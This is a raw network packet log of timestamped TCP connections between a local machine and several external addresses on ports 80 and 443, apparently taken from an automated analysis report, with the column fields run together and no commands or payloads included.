                                                                                                                                                                                Nov 25, 2024 14:06:50.384928942 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.384968996 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.388686895 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.388740063 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.388847113 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.388894081 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.392610073 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.392663002 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.392714024 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.392755032 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.396277905 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.396332026 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.397206068 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.397258043 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.399920940 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.399974108 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.400161028 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.400202990 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.403774023 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.403785944 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.403825045 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.407063007 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.407123089 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.407166958 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.407207012 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.410657883 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.410722971 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.410756111 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.410794973 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.413963079 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.414038897 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.414055109 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.414088011 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.417377949 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.417448997 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.417455912 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.417495012 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.420785904 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.420849085 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.420922995 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.420959949 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.424211025 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.424293041 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.424329042 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.424371958 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.427645922 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.427699089 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.427699089 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.427741051 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.429501057 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.429559946 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.429564953 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.429603100 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.431355953 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.431401968 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.431586981 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.431624889 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.433518887 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.433582067 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:54.783381939 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:54.783447981 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:54.972381115 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:54.972436905 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:54.972485065 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:54.973227024 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:54.973241091 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:56.341204882 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:56.341311932 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:56.345134020 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:56.345151901 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:56.357750893 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:56.357774973 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:56.851505041 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:56.851578951 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:56.851598024 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:56.851645947 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:56.852317095 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:56.852334976 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.131335974 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:58.299994946 CET4916780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:58.421709061 CET8049167172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.424722910 CET4916780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:58.865112066 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:06:58.865185022 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.865242004 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:06:58.869066954 CET49169443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:58.869112968 CET44349169198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.869169950 CET49169443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:58.871805906 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:58.871845007 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.871999025 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:58.878789902 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:06:58.878832102 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.899297953 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:58.899331093 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.899827003 CET49169443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:58.899849892 CET44349169198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.313244104 CET44349169198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.313383102 CET49169443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.313837051 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.313924074 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.355925083 CET49169443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.355951071 CET44349169198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.356360912 CET44349169198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.356411934 CET49169443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.365066051 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.365093946 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.365621090 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.365686893 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.719177961 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.719362974 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:00.722242117 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.727035999 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:00.727119923 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.727549076 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.767326117 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.856273890 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:00.899341106 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.119707108 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.119926929 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.120065928 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:01.121316910 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:01.121345043 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.122220993 CET4916780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:01.122457027 CET4917180192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:01.242463112 CET8049171172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.242558002 CET4917180192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:01.242691040 CET8049167172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.242755890 CET4916780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:01.242827892 CET4917180192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:01.265377045 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.265399933 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.265481949 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.265552998 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.289186954 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.289201975 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.289222956 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.289282084 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.289356947 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.289427042 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.362818956 CET8049171172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.466622114 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.466635942 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.466660023 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.466732025 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.468760014 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.493586063 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.493596077 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.493679047 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.493720055 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.493803978 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.516417027 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.516431093 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.516511917 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.516554117 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.541424990 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.541461945 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.541551113 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.541614056 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.669089079 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.669105053 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.669274092 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.669325113 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.677911043 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.677923918 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.677953005 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.677998066 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.678020954 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.678096056 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.695874929 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.695888996 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.695919037 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.696068048 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.707509041 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.707519054 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.707549095 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.707597017 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.707645893 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.719485998 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.719496965 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.719520092 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.719567060 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.719567060 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.735996008 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.736006021 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.736032963 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.736078978 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.736166000 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.748791933 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.748801947 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.748883009 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.748915911 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.873640060 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.873673916 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.873722076 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.873790979 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.873861074 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.884466887 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.884475946 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.884505033 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.884555101 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.884555101 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.893768072 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.893776894 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.893802881 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.893846989 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.893902063 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.903392076 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.903402090 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.903424025 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.903475046 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.903587103 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.915530920 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.915546894 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.915648937 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.915673971 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.930857897 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.930881023 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.930999041 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.931020021 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.934237003 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.934247971 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.934437990 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.934453964 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.946508884 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.946522951 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.946618080 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.946640968 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.957509041 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.957520962 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.957613945 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.957648993 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.966675043 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.966684103 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.966762066 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.966814041 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.976089954 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.976100922 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.976180077 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.976192951 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.988512993 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.988528013 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.988630056 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.988696098 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.997809887 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.997819901 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.997869968 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:01.997900963 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.073683977 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.073698044 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.073771000 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.073808908 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.081161022 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.081187010 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.081195116 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.081219912 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.081259966 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.081279039 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.088509083 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.088521004 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.088546991 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.088561058 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.088571072 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.088587046 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.088668108 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.097784996 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.097791910 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.097814083 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.097841978 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.097922087 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.104182959 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.104192019 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.104243994 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.104255915 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.112508059 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.112541914 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.112565994 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.112598896 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.112643003 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.118753910 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.118763924 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.118814945 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.118848085 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.123976946 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.124033928 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.124049902 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.124064922 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.128160954 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.128215075 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.128223896 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.131066084 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.131134987 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.131144047 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.135097027 CET44349168193.30.119.205192.168.2.22
